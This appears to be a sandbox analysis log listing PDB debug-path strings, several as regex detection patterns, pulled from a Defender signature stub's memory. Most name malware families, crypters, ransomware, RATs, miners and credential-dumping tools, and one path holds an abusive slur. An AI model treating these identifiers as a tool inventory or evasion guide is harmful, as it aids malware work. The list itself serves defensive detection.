Source:	Binary string: P'Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: M(\\qbot_debugger\\.+\\qbot_debugger\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdbGCTL source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: freefilesync_x64.pdb source: MpSigStub.exe, 00000026.00000003.18339794865.00000138BD272000.00000004.00000001.sdmp
Source:	Binary string: \T+M\Result\DocPrint.pdb] source: MpSigStub.exe, 00000026.00000003.18434572336.00000138BE6AE000.00000004.00000001.sdmp
Source:	Binary string: \13930308\Bot_70_FIX HEADER_FIX_LONGURL 73_StableAndNewProtocol - login all\Release\Bot.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: P)E:\\Production\\Tool-Developing\\.+\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: d:\74\55\Child\Require\bank\Bear\rather\66\Boy\front\special\straight\wood\1\guide.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: KSLD.pdb source: MpSigStub.exe, 00000026.00000003.18254559214.00000138ADCEB000.00000004.00000001.sdmp
Source:	Binary string: \SecurityService\SecurityService\obj\Release\WindowsSecurityService.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: cryptdll.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: 2gerGW@4herhw*9283y4huWO.pdb] source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: reg.pdbd source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: D:\Projekty\EvulSoft\TibiSavePass\Programy\Stub VISUAL\Release\Stub VISUAL.pdb source: MpSigStub.exe, 00000026.00000003.18436433001.00000138BE5A6000.00000004.00000001.sdmp
Source:	Binary string: !#HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: .+:\\.+\\.Pedro\\.PH_Secret_Application.\\PH_Secret_Application.\\.+\\Release\\.*.pdb source: MpSigStub.exe, 00000026.00000003.18434898565.00000138BE7B6000.00000004.00000001.sdmp
Source:	Binary string: !6zyA6@267=HPS.C\|dMqd4-qaN\|yjm.pdb source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: eTiq_WaEN__y9F89zLukjmM.pdbx source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: @.pdb source: MpSigStub.exe, 00000026.00000003.18309610141.00000138BE5A6000.00000004.00000001.sdmp
Source:	Binary string: \b\Ship\Win32\VideoProjectsLauncher\VideoProjectsLauncher.pdb source: MpSigStub.exe, 00000026.00000003.18335030768.00000138BE917000.00000004.00000001.sdmp
Source:	Binary string: HSTR:Win32/sfxrar.pdb.A source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp
Source:	Binary string: vssadmin.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: ciTfDCxMQU0a5/DDEyGwn8ta.z4.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: r:\rel\iMS-srvreg56.pdb source: MpSigStub.exe, 00000026.00000003.18298692792.00000138BDFE8000.00000004.00000001.sdmp
Source:	Binary string: 50G:\\combustion\\aiding\\breaching\\stooping.pdb source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp
Source:	Binary string: msnetobj.pdb3 source: MpSigStub.exe, 00000026.00000003.18332878772.00000138BD2D2000.00000004.00000001.sdmp
Source:	Binary string: \Release\Cloudy.pdb] source: MpSigStub.exe, 00000026.00000003.18436729907.00000138BE5E7000.00000004.00000001.sdmp
Source:	Binary string: lsasrv.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: llq001\src\out\Official\UpdateChecker.exe.pdb source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-comm-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18298490713.00000138BDFB9000.00000004.00000001.sdmp
Source:	Binary string: fA\\win\\build\\src\\build\\Release\\chrome_frame_helper\.exe\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: K8MiniPage.pdb source: MpSigStub.exe, 00000026.00000003.18329330778.00000138BCB46000.00000004.00000001.sdmp
Source:	Binary string: PELoader.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: _darkshell\i386\DarkShell.pdb] source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: Session.*\\Release\\GenIt\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: d:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: \Release\ProtectedService.pdb source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb` source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: [cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: \release\LSASecretsView.pdbx source: MpSigStub.exe, 00000026.00000003.18315521913.00000138BDDA8000.00000004.00000001.sdmp
Source:	Binary string: #CNC Plugins Tools\ProgFactory_d.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: SelfMother\SeaFriend\SmallStore\save.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: *.pdb.\|!\VstsGitSourceIndex.exe source: MpSigStub.exe, 00000026.00000003.18294586651.00000138AA78B000.00000004.00000001.sdmp
Source:	Binary string: \Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: F:\rdpscan\Bin\Release_logged\x64\rdpscan.pdb source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp
Source:	Binary string: 'D:\code\ccminer\Release\x64\ccminer.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: 4G:\Work\Bison\BisonNewHNStubDll\Release\Goopdate.pdb] source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: msvfw32.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \FARATCLIENT\obj\Debug\FARATCLIENT.pdb source: MpSigStub.exe, 00000026.00000003.18430579741.00000138BEBEB000.00000004.00000001.sdmp
Source:	Binary string: hal.pdb source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp
Source:	Binary string: JOe\|OBzjATck#psb/.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \mspass.pdb source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp
Source:	Binary string: \bin\pxdl.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: D:\WorkObject\SupL_EnableBHO\BHOEnabler\bin\BHOEnabler.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: WirelessKeyView.pdb source: MpSigStub.exe, 00000026.00000003.18310205090.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: i=[cC]:\\Project(s)?\\ATLResDLL\\release\\AtlResDllR(es)?\.pdb source: MpSigStub.exe, 00000026.00000003.18310798250.00000138BDEB0000.00000004.00000001.sdmp
Source:	Binary string: \SSFK\Release\SSFK.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: $\SuperLight\release\MfcDllServer.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: 3.C:\\Obnubilate\\Temp\\[a-z0-9]{26}\\Stub\.pdb source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp
Source:	Binary string: Release\adviser.pdb source: MpSigStub.exe, 00000026.00000003.18312208260.00000138BDE5C000.00000004.00000001.sdmp
Source:	Binary string: <7\\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: JJDownLoader\Bin\JJDownLoader_a.pdb source: MpSigStub.exe, 00000026.00000003.18314349341.00000138BD01D000.00000004.00000001.sdmp
Source:	Binary string: \tutorial\Release\CoffeeShop6.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: iashlpr.pdb source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp
Source:	Binary string: \\fishmaster\\x64\\Release\\fishmaster\.pdb source: MpSigStub.exe, 00000026.00000003.18318003902.00000138BD399000.00000004.00000001.sdmp
Source:	Binary string: advapi32.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: ZAService.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: gMolq.pdb source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp
Source:	Binary string: O&\\wininet_fr_20200212\\.+\\?dlln\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: rStub\LimitlessLoggerStub\obj\x86\Debug\LLS.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: fk_drv.pdb] source: MpSigStub.exe, 00000026.00000003.18438264865.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: RamMap.pdb source: MpSigStub.exe, 00000026.00000003.18332668729.00000138BD2B0000.00000004.00000001.sdmp
Source:	Binary string: C:\src\similar\clients\our\new_bundler\nsis_plugins\plugins\safed.pdbxm source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: c:\\Injekt - Builds\\.*\\SpeedBrowserP\\Source\\shortcut\\Encoder\\obj\\Release\\shortcut.pdb source: MpSigStub.exe, 00000026.00000003.18299088622.00000138BDEB1000.00000004.00000001.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: aeroadmin.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: rpcss.pdb source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: \Release\UpdaterService.pdb source: MpSigStub.exe, 00000026.00000003.18318585819.00000138BE41B000.00000004.00000001.sdmp
Source:	Binary string: \Rasomware2.0.pdb source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: You\Above\Particular\Exception.pdb source: MpSigStub.exe, 00000026.00000003.18320722145.00000138BD946000.00000004.00000001.sdmp
Source:	Binary string: \down\Wing\Would.pdb source: MpSigStub.exe, 00000026.00000003.18292669743.00000138BD567000.00000004.00000001.sdmp
Source:	Binary string: mafia2injector\Release\MafiaInjector.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: m3KHLMcF.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: sdmf\|er.pdb source: MpSigStub.exe, 00000026.00000003.18433249672.00000138BE66B000.00000004.00000001.sdmp
Source:	Binary string: \Release\TKCodeDDoS.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: Release\haozip.chs\bin\Win32\release\pdb\HaoZip7zSetup.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x86\Release_logged\payload32.pdb source: MpSigStub.exe, 00000026.00000003.18437644222.00000138BDCE2000.00000004.00000001.sdmp
Source:	Binary string: CrossLoopService.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: \Release\winsrcsrv.pdb source: MpSigStub.exe, 00000026.00000003.18333799062.00000138BDC1C000.00000004.00000001.sdmp
Source:	Binary string: hcd:\\MODULOS\\PROJETO BATMAN\\Loaders\\Loader C# Crypter .* LINK .*\\obj\\x86\\Debug\\golfzinho.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: G\SharedSerialization\obj\Release\netstandard2.0\SharedSerialization.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: ir41_qcx.pdb source: MpSigStub.exe, 00000026.00000003.18350786721.00000138BD66E000.00000004.00000001.sdmp
Source:	Binary string: dbmsrpcn.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: mciole32.pdb source: MpSigStub.exe, 00000026.00000003.18337788205.00000138BD0C2000.00000004.00000001.sdmp
Source:	Binary string: termsrv.pdbaA source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: Deamon-dll.*\\Release\\Deamon-dll\.pdb source: MpSigStub.exe, 00000026.00000003.18317720831.00000138BDA90000.00000004.00000001.sdmp
Source:	Binary string: irprops.pdbj source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: Pb730.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \Release\NvBackend.pdbx source: MpSigStub.exe, 00000026.00000003.18323600754.00000138BDB57000.00000004.00000001.sdmp
Source:	Binary string: ReleaseDebug\TvServer.pdb source: MpSigStub.exe, 00000026.00000003.18295324067.00000138BE20A000.00000004.00000001.sdmp
Source:	Binary string: borlo 1.9.7 src\WindowsApplication1\obj\Debug\Winlogon.pdb source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: 0rStub\LimitlessLoggerStub\obj\x86\Debug\LLS.pdb source: MpSigStub.exe, 00000026.00000003.18437958836.00000138BDD23000.00000004.00000001.sdmp
Source:	Binary string: usp10.pdbj source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: \output\MinSizeRel\updrem.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: +kill\yourself\@YongruiTan\chinese\idiot.pdb source: MpSigStub.exe, 00000026.00000003.18431158407.00000138BE311000.00000004.00000001.sdmp
Source:	Binary string: \Disable_Windowsupdate.pdbaG source: MpSigStub.exe, 00000026.00000003.18345142336.00000138BCDE5000.00000004.00000001.sdmp
Source:	Binary string: "SimCorp.XMGRs.Testing.ApiTests.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: \SupNewTab\bin\SupTab.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: tixati.pdb source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: uigjhghio.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \i386\iSafeNetFilter.pdb source: MpSigStub.exe, 00000026.00000003.18337502514.00000138BD081000.00000004.00000001.sdmp
Source:	Binary string: \P2P\Client\Debug\Client.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: schtasks.pdbd*Microsoft Corporation source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: c:\mpengine.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\winver\objfre\i386\winver.pdb source: MpSigStub.exe, 00000026.00000003.18351876437.00000138BCDCA000.00000004.00000001.sdmp
Source:	Binary string: Amon\Current\nethfdrv\Production\netupdsrv.pdb source: MpSigStub.exe, 00000026.00000003.18296056460.00000138BE07F000.00000004.00000001.sdmp
Source:	Binary string: SKRFM.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: I \\aes_mfc\\Release\\aes_mfc.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: appmgmts.pdb source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: \src\out\Release\cleaner.pdb source: MpSigStub.exe, 00000026.00000003.18336058119.00000138BD221000.00000004.00000001.sdmp
Source:	Binary string: \chrome-toolbox\trunk\src\plugin\apihook.pdb source: MpSigStub.exe, 00000026.00000003.18324271972.00000138BDBDB000.00000004.00000001.sdmp
Source:	Binary string: DownExecute.pdb source: MpSigStub.exe, 00000026.00000003.18437035378.00000138BDFFA000.00000004.00000001.sdmp
Source:	Binary string: \GG-Ransomware-master\GG ransomware\GG ransomware\obj\Debug\Ransom.pdb source: MpSigStub.exe, 00000026.00000003.18429216145.00000138BD7FA000.00000004.00000001.sdmp
Source:	Binary string: \defeat\rtl49.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: \i386\Driver.pdb source: MpSigStub.exe, 00000026.00000003.18432036544.00000138BD146000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\MiniSword\MakeSword\MakeSword\obj\Debug\MakeSword.pdb source: MpSigStub.exe, 00000026.00000003.18331763483.00000138BE49F000.00000004.00000001.sdmp
Source:	Binary string: \CoronaVirus Status.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: I \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 'c:\Top\Train\job\Wall\Did\Spendkept.pdb] source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: d:\pavbld\amcore\MpEngine\mavutils\Source\sigutils\vdlls\Microsoft.NET\VFramework\Windows\Windows.pdb source: MpSigStub.exe, 00000026.00000003.18321039197.00000138BD98C000.00000004.00000001.sdmp
Source:	Binary string: 2 Ransom:MSIL/Cryptolocker.PDB!MTB source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp
Source:	Binary string: wpnpinst.pdb source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp
Source:	Binary string: GC:\Users\wizzlabs\source\repos\SaveJuin\Nuigi\obj\Release\Baddelima.pdb source: MpSigStub.exe, 00000026.00000003.18334733543.00000138BCF14000.00000004.00000001.sdmp
Source:	Binary string: adptif.pdb source: MpSigStub.exe, 00000026.00000003.18347347691.00000138BEAA2000.00000004.00000001.sdmp
Source:	Binary string: D:\\MyCode\\riot.?\\encryptor.+\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 0Z:\NewProjects\hotsend\Release-Win32\hotsend.pdb source: MpSigStub.exe, 00000026.00000003.18309026309.00000138BD4A8000.00000004.00000001.sdmp
Source:	Binary string: <tmp\x86-Public-Game\LoL\RiotLoL_Client\League of Legends.pdba source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: \x64\Release\SFKEX64.pdb source: MpSigStub.exe, 00000026.00000003.18355537254.00000138BCF99000.00000004.00000001.sdmp
Source:	Binary string: @g-e3e_2qalAN+/PaKV/J.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: .+:.*\\obfuscator\\SkypeBot.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: D:\DevPatch\_FINAL\Bin\MapleStory.pdb source: MpSigStub.exe, 00000026.00000003.18296951613.00000138BE396000.00000004.00000001.sdmp
Source:	Binary string: 0\wrapper3.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: !kpdfcore\obj\Release\kpdfcore.pdb source: MpSigStub.exe, 00000026.00000003.18326492976.00000138BE3E0000.00000004.00000001.sdmp
Source:	Binary string: SuzanDLL\Release\suzanw.pdb source: MpSigStub.exe, 00000026.00000003.18310511339.00000138BDE6F000.00000004.00000001.sdmp
Source:	Binary string: T:\TFS-TradeProject\PDB\Release\TT-Miner.pdb source: MpSigStub.exe, 00000026.00000003.18293843088.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: \ggg\build\Release_32\libglib-2.0-0.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
Source:	Binary string: cmd.pdb source: MpSigStub.exe, 00000026.00000003.18301521899.00000138BE774000.00000004.00000001.sdmp
Source:	Binary string: d+D:\tortoiseSVN\nsc5\bin\Release\nssock2.pdbd source: MpSigStub.exe, 00000026.00000003.18430295296.00000138BEBAA000.00000004.00000001.sdmp
Source:	Binary string: er.pdb source: MpSigStub.exe, 00000026.00000003.18296356390.00000138BE0C0000.00000004.00000001.sdmp
Source:	Binary string: Sniffer\Release\Sniffer.pdbxS source: MpSigStub.exe, 00000026.00000003.18353014898.00000138BD7B9000.00000004.00000001.sdmp
Source:	Binary string: diskpart.pdb source: MpSigStub.exe, 00000026.00000003.18354806789.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: x:\Dev_CPP\Work\VS_KnzStr_Adware\Release\VS_Work1.pdb source: MpSigStub.exe, 00000026.00000003.18326026778.00000138BCBB8000.00000004.00000001.sdmp
Source:	Binary string: F:\Projects\WebInject\bin\x64\Release_logged\webinject64.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: "E:\DLMon5\drv\obj\i386\RioDrvs.pdba source: MpSigStub.exe, 00000026.00000003.18436125478.00000138BD62B000.00000004.00000001.sdmp
Source:	Binary string: d:\build.obj.x86fre\amcore\mpengine\mavutils\source\sigutils\vfilesystem\files\logoff\objfre\i386\logoff.pdb source: MpSigStub.exe, 00000026.00000003.18424475350.00000138BD8C1000.00000004.00000001.sdmp
Source:	Binary string: module_ls.pdb source: MpSigStub.exe, 00000026.00000003.18435519768.00000138BD45D000.00000004.00000001.sdmp
Source:	Binary string: \\Projects\\dll.\\.+\\dll.\.pdb source: MpSigStub.exe, 00000026.00000003.18313767816.00000138BE892000.00000004.00000001.sdmp
Source:	Binary string: 8rise\Window\position\Character\opposite\Miss\lawCome.pdb~ source: MpSigStub.exe, 00000026.00000003.18435217053.00000138BD41C000.00000004.00000001.sdmp
Source:	Binary string: Seed\trunk\output\bin\ntsvc.pdbxO source: MpSigStub.exe, 00000026.00000003.18299675099.00000138BE03D000.00000004.00000001.sdmp
Source:	Binary string: 2branches\xiaoyuTrunk\bin\Release\Win32\Upgrade.pdb source: MpSigStub.exe, 00000026.00000003.18338078941.00000138BD104000.00000004.00000001.sdmp
Source:	Binary string: \\Project's\\xCrypt3r\\stub_crypter\\Release\\stub.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-security-base-l1-1-0.pdb source: MpSigStub.exe, 00000026.00000003.18314057962.00000138BE8D4000.00000004.00000001.sdmp
Source:	Binary string: 9C:\Users\Seman\source\repos\Triforce\Release\Triforce.pdb source: MpSigStub.exe, 00000026.00000003.18337288122.00000138BDCB4000.00000004.00000001.sdmp
Source:	Binary string: X:\\DEgELgPMENT\\VC\+\+\\CrgptorgEvolugionggld\\relgase\\m.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: FDM3\bin\Release\FdmBrowserHelper.pdb source: MpSigStub.exe, 00000026.00000003.18335675853.00000138BD1CB000.00000004.00000001.sdmp
Source:	Binary string: wmidx.pdbj source: MpSigStub.exe, 00000026.00000003.18309839037.00000138BE5D9000.00000004.00000001.sdmp
Source:	Binary string: dsget.pdb source: MpSigStub.exe, 00000026.00000003.18325199016.00000138BEA60000.00000004.00000001.sdmp
Source:	Binary string: ramaint.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: mstext40.pdb3 source: MpSigStub.exe, 00000026.00000003.18312795035.00000138BEAE5000.00000004.00000001.sdmp
Source:	Binary string: \Release\initialexe\torch.exe.pdbxE source: MpSigStub.exe, 00000026.00000003.18351550928.00000138BCD89000.00000004.00000001.sdmp
Source:	Binary string: d:\Projects\AKL\kh\Release\kh.pdb source: MpSigStub.exe, 00000026.00000003.18314933274.00000138BCB04000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\MARIO\source\repos\ENCRIPTAR\x64\Release\ENCRIPTAR.pdb source: MpSigStub.exe, 00000026.00000003.18431738263.00000138BE1C7000.00000004.00000001.sdmp
Source:	Binary string: \RocketTabInstaller\Release\Installer.pdb. source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: ,ByShell_Up19\DarkShell\Release\DarkShell.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: ZohoTray.pdb source: MpSigStub.exe, 00000026.00000003.18326787908.00000138BE45C000.00000004.00000001.sdmp
Source:	Binary string: ,IKlllQWgbhejkWEJKHw7\\werrnJEKLJ32hjelkk.PDB source: MpSigStub.exe, 00000026.00000003.18429655870.00000138BE6F0000.00000004.00000001.sdmp
Source:	Binary string: DDTBG.pdb source: MpSigStub.exe, 00000026.00000003.18432962909.00000138BE62A000.00000004.00000001.sdmp
Source:	Binary string: \iSafeKrnlKit.pdb source: MpSigStub.exe, 00000026.00000003.18301813906.00000138BCBCB000.00000004.00000001.sdmp
Source:	Binary string: version.pdb@SH source: MpSigStub.exe, 00000026.00000003.18327500976.00000138BDB98000.00000004.00000001.sdmp
Source:	Binary string: api-ms-win-core-processthreads-l1-1-2.pdb source: MpSigStub.exe, 00000026.00000003.18345017281.00000138BCDCB000.00000004.00000001.sdmp
Source:	Binary string: ToolbarCore\toolbar\ie\src\toolbar\wrapper\Release\externalwrapper.pdb source: MpSigStub.exe, 00000026.00000003.18303257076.00000138BE522000.00000004.00000001.sdmp
Source:	Binary string: LERKBleRM.pdb source: MpSigStub.exe, 00000026.00000003.18430871789.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: c:\stayWide\softthey\markethorse\bothside\of.pdb source: MpSigStub.exe, 00000026.00000003.18304770549.00000138BDA4F000.00000004.00000001.sdmp
Source:	Binary string: \devilman\xxxxx\catfight\iygmygjkxtyu.pdb source: MpSigStub.exe, 00000026.00000003.18433546699.00000138BC981000.00000004.00000001.sdmp
Source:	Binary string: Release\RuPass.pdb] source: MpSigStub.exe, 00000026.00000003.18304476785.00000138BE2D0000.00000004.00000001.sdmp
Source:	Binary string: \Release\bdSetup.pdb source: MpSigStub.exe, 00000026.00000003.18336277246.00000138BD3DA000.00000004.00000001.sdmp
Source:	Binary string: Release\VersionChecker.pdb source: MpSigStub.exe, 00000026.00000003.18297254258.00000138BD45F000.00000004.00000001.sdmp
